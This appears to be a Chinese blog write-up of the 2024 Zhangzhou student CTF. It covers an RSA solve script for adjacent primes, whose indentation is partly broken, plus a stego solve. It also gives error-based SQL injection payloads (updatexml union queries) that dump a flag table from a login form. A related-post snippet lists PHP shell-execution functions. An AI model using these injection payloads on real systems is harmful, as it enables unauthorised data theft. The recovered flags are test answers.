“漳盾-2024“漳州市大学生网络安全技能竞赛wp

已于 2024-06-05 22:10:50 修改
阅读量1.5k 收藏 48
点赞数 42
文章标签: web安全 python 安全
于 2024-06-05 22:10:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75472462/article/details/139483177
版权

0x01 RES*3

flag = b'xxx'
e = 0x10001 # 
p = getPrime(1024)
q = next_prime(p)
n = p*q*3 
m = bytes_to_long(flag)
​
c = pow(m , e, n//3)
# c=···
# n=···

这是加密源码 rsa密钥格式: 公钥(e,n) 私钥(d,n)

已知:

  1. q是p的下一个质数

  2. n 为两个互素(p,q)相乘 是公私钥的公共部分

  3. 公钥e 由对p,q使用欧拉函数=t

  • 1<e<(p-1)*(q-1)=t

  • 质数

  • 非t的因子

  1. 密文c

  • 函数功能: pow(a,b,c) ~ (a**b)%c

  • 选取两个互素的数(q,p)

  • pq=n/3 即pow第3个参数 _当a3=n时 n//3=n/3_

加密流程 对flag(大数)取公钥e的幂再取n/3的模 => c = pow(m , e, n//3)

因为1.点 我们可以轻易的 把n/3分解 出 q和p 绕后再和公钥e,密文c 搞出密钥

然后套脚本

#python3
from gmpy2 import invert,iroot,next_prime,is_square
from Crypto.Util.number import long_to_bytes
def C2(p,q,e,c):
    """
    p q 两互素数
    e 加密公钥
    c 密文
    """
    n = q * p
    d = invert(e, (p - 1) * (q - 1))
    m = pow(c,d,n) # 明文= (c**d) % n
​
    print(f'密钥d= {d}\n明文m= {m}\n= {long_to_bytes(m)}')
  def pow(c, d, n): # 功能=日常版:(c**d)%n
    """模幂运算"""# pow实现
    result = 1
    c = c % n
    while d > 0:
        if d % 2 == 1:
            result = (result * c) % n
        d = d >> 1
        c = (c * c) % n
    return result
​
class Find_two_primes:
    def ori(n):
        """求解两个质数mini"""
        for i in range(2, n // 2 + 1):
            if n % i == 0 and is_prime(i) and is_prime(n // i):
                return i, n // i  # 找到两个质数
    def pri(n): # 优先
        # n为两个质数的乘积
          #且俩个质数是相邻的(中间没有其他质数) 例如 p=3,q=next_prime(p)=5
        temp = iroot(n, 2)[0]
             # 函数介绍
             # 大数开根参数2为要开的几次根 填3就是开3次方根
             # 返回值(开根结果,是否整开) 例如 iroot(8,3)=(2,True)
        p = next_prime(temp)
        return p, n // p
    def las(n):# 备选
        """平方差遍历法"""
        a = iroot(n, 2)[0]
        while True:
            B2 = pow(a, 2) - n
            a += 1
            if is_square(B2):
                b = iroot(B2, 2)[0]
                return a+b, a-b
​
class Big_int_Div:
    def v1(big_integer,n): 
        """计算机除法"""
        result = 0
        while big_integer >= n:
            big_integer -= n
            result += 1
        return result
    def v2(big_integer, n):
        """更计算机的除法"""
        result = 0
        while big_integer >= n:
            shift = 0
            while big_integer >= (n << shift):
                shift += 1
            shift -= 1
            subtract_value = n << shift
            result += 1 << shift
            big_integer -= subtract_value
        return result
​

  • n=n/3

  • q,p=分解n

  • 解密函数(p,q,e,c)

# ···
def main():
    n =48631461114504503213933048503236631533108340381677563261416131764658798634145883506203948744902487835274001561646896513476389080691870633589596240502747958833769040450560137103097820329536792734430618544696183744330640322513642884524728049974270249753729085459403038574272231768464838017621829072648029807829095343724559240032690561313806010603606220226714941054497016911813749574102838793091541121640667581981661315152119641131315431472431865815936345789998105577855981463908914332966444762997193930994154180446298739894980388777485003296091460844322677788383641440700742948260816970842749014086241622298755623639397
    n_r=Big_int_Div.v2(n,3)
    p,q= Find_two_primes.pri(n_r)
    print(f'p= {p}\nq= {q}')
    e = 0x10001 *1
    print(e) #65537
    c = 15610381842734402431720343151826628531590822170873607546255021731309786187174986256688016153266596244825648019184784412881437108994627156029510560778331435777505796991022243495209454544720846975689290327454048500687196256648449010010966539798671100193800707101606911948736138293851168052487163502836832441394970590930617478469167562843650297355987752517460703563226259207743330949709693581492700790922368978463309899994408526223486195108719647298439243184344162210231016213340341385576796861623571842183930617482532017200517037600184736532750337445679952241192297520774169278803591905366512003079320198165950526741789
    C2(p,q,e,c)
if __name__=='__main__':
    main()

flag{2d08613c-5a4d-a0f1-b0fd-c195026c87b7}

0X02 ROTOTS

0X03老生常谈的注入

进入界面,进行传值抓包

发现是POST传值

开始推测注入点

uname=admin'&passwd=123456

没图片,这边先让sql语句报错,报错信息输出and ('passwd=123456') ...发现闭合点是('')

开始构建pyload,没在比赛的时候截图

uname=admin') union select 1,updatexml(1,concat(0x7e,(group_concat(database()) )),1),d--+ &passwd=123456  //爆出数据库
​
uname=admin') union select 1,updatexml(1,concat(0x7e,(select group_concat(flag_that_you_find_must_be_me) from flag)),2),d--+ &passwd=123456
//中间的爆表,数据列就不写了;这句爆flag,发现没全出来要进行截断读取
flag{lIk1wywjS4uo48BqrhcKLUhKTb
​
​
uname=admin') union select 1,updatexml(1,substr(concat(0x7e,(select group_concat(flag_that_you_find_must_be_me) from flag)), 10),d--+ &passwd=123456
​
截断输出
wywjS4uo48BqrhcKLUhKTboPFYJR}
​
拼接后flag{lIk1wywjS4uo48BqrhcKLUhKTboPFYJR}

0x04梦回还

发现是一个图片

放入Stegsolve

发现7z压缩包文件头,保存出来

flag{2cf1cf10-ab68-67a0-bf27-226c0b839a66}

0x05 46spim

0x06 moreandno

           狗拖
关注
第十届全国大学生信息安全竞赛-web-writeup
dengzhasong7076的博客
07-11 700
PHP execise http://106.75.126.194:6789 备用 http://106.75.126.228:6789 输入点是能够执行php代码的,看了一下disabled_function assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open,pcntl_alarm,pcntl_fork,...
刷题记录7.1
PUTAOAO的博客
07-01 398
BUU rsa2 好早之前做的一直提交不正确 然后发现是py3和py2 的md5不一样 虽然不知道为什么。 给出了n和e 求d e很大 用winner attack求出d BJDCTF RSA from Crypto.Util.number import getPrime,bytes_to_long flag=open("flag","rb").read() p=getPrime(1024) q=getPrime(1024) assert(e<100000) n=p*q m=bytes_to_lo
[DASCTF Apr.2023 X SU战队2023开局之战] crypto复现
weixin_52640415的博客
04-26 1610
ecrsa hnp 卡迈尔数 hash碰撞
CTFSHOW easyrsa1-6 Writeup
abtgu的博客
09-17 2445
easyrsa1 题目: 无 解题思路: 题中给了e,n,c,可以分解n得到p,q,在线分解大整数网址http://www.factordb.com/index.php 。脚本如下: import gmpy2 import binascii e = 65537 n = 1455925529734358105461406532259911790807347616464991065301847 c = 69380371057914246192606760686152233225659503366319332
RSA的破解
weixin_44681716的博客
07-04 2268
题目 在已知密文、公钥和加密算法的前提下求解私钥和明文
2023年第三届陕西省大学生网络安全技能大赛--本科高校组 Reverse题解
OrientalGlass的博客
06-03 4576
这次比赛总体感觉很好,比前几天黑盾杯和国赛坐牢要好太多,虽然一些题目没见过,但是在网上查一下就能找到相关文章和工具还要重视理论知识水平,不能做脚本小子,这些题目虽然有现成的工具做,但还是要了解一下相关原理,不然下次变一下就呆住了.例如这个的babypython,以前都是用工具或者脚本直接干pyc文件,这次只能生啃字节码(还好有gpt强大的分析能力),甚至还有很多混淆和跳转代码,也是锻炼到了啃字节码的能力另一方面,个人的经验还是不足,还要继续多做题,多比赛,多复现,勤能补拙。
第五届浙江省大学生网络与信息安全竞赛-技能挑战赛WP
https://goodlunatic.github.io/
09-18 2543
第五届浙江省大学生网络与信息安全竞赛-技能挑战赛WP
第五届浙江省大学生网络与信息安全竞赛预赛 部分WP
weixin_46356548的博客
09-17 2365
第五届浙江省大学生网络与信息安全竞赛-技能挑战赛 预赛 部分WP
【电子取证】程序分析(第六届”蓝帽杯“全国大学生网络安全技能大赛)
07-12
第六届”蓝帽杯“全国大学生网络安全技能大赛
2024年第十七届全国大学生信息安全竞赛创新实践能力赛初赛部分Writeup
05-27
2024年第十七届全国大学生信息安全竞赛创新实践能力赛初赛部分Writeup解析部分题目
2024江苏省第二届数据安全技术应用职业技能竞赛预赛实操题及Writeup
08-20
包括全部7道题,包括题目、附件以及Writeup
全国大学生信息安全竞赛安徽省赛-初赛WP
qq_43647197的博客
10-14 1166
全国大学生信息安全竞赛安徽省赛-初赛WP
第五届浙江省网络与信息安全竞赛部分WP
hahaHalsey的博客
09-18 952
后续再补充
[NCTF2020]babyRSA Writeup
bestkasscn的博客
11-29 515
[NCTF2020]babyRSA 题目描述 from Crypto.Util.number import * from flag import flag def nextPrime(n): n += 2 if n & 1 else 1 while not isPrime(n): n += 2 return n p = getPrime(1024) q = nextPrime(p) n = p * q e = 0x10001 d = inverse(e,
网数中心举办CISAW安全软件教师培训 助力国家网络安全战略
qq_44969472的博客
10-15 407
他强调,CISAW安全软件人员认证应立足我国软件安全开发的特色,以服务国家网络安全战略布局为核心,通过认证结果不断带动人员能力提升,聚焦行业需求、热点和难点问题,进一步完善创新发展体系。我们相信,随着CISAW认证体系的不断完善和发展,必将为我国信息安全领域输送更多优秀的人才,助力国家信息安全事业迈上新的台阶。这一环节得到了大家的一致好评,许多教师表示,通过实际操作,他们不仅巩固了所学知识,还获得了更多的实战经验。他表示,通过这次培训,大家不仅学到了最新的技术和理念,更重要的是,明确了未来努力的方向。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
10-15 1226
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
区块链技术在网络安全中的应用研究
最新发布
CWPIN21的博客
10-19 507
区块链是一种去中心化的分布式账本,它由一系列按照时间顺序连接的数据块组成。每个数据块包含了一定时间内的交易数据,这些数据块通过密码学算法链接在一起,形成一个不可篡改的链条。区块链的核心原理包括分布式账本、共识机制、密码学原理和智能合约。分布式账本确保数据在多个节点上进行存储和更新,避免了单点故障;共识机制保证了节点之间对数据的一致性认可;密码学原理用于保障数据的完整性和保密性;智能合约则实现了基于规则的自动执行操作。
软考(网工)——网络安全
2301_80093566的博客
10-18 648
公钥密码又称为非对称加密,就是对数据加密和解密的密钥是不同的。密钥分发方便、密钥保管量少、支持数字签名。加密速度慢(计算量大,不适合加密大数据)、数据膨胀率高。公钥公开,私钥自己保存。公钥加密,私钥解密,可实现保密通信私钥加密,公钥解密,可实现数字签名常见的非对称加密算法如下:RSA:512位(或1024位)密钥,计算量极大,难破解。Elgamal、ECC(椭圆曲线算法)、背包算法、Rabin、DH等。网络攻击分类:主动和被动。
2024网络安全进阶手册:三个月黑客技术自学路线
2401_85027336的博客
10-18 765
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
"2021江西省网络安全职业技能竞赛任务书及拓扑图
2021年江西省网络安全职业技能竞赛的赛题为wp全!比赛任务涵盖了登录安全加固、Web安全加固、流量完整性保护与事件监控、防火墙策略、Windows操作系统安全配置、Linux操作系统安全配置、系统漏洞利用与提权、Linux...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值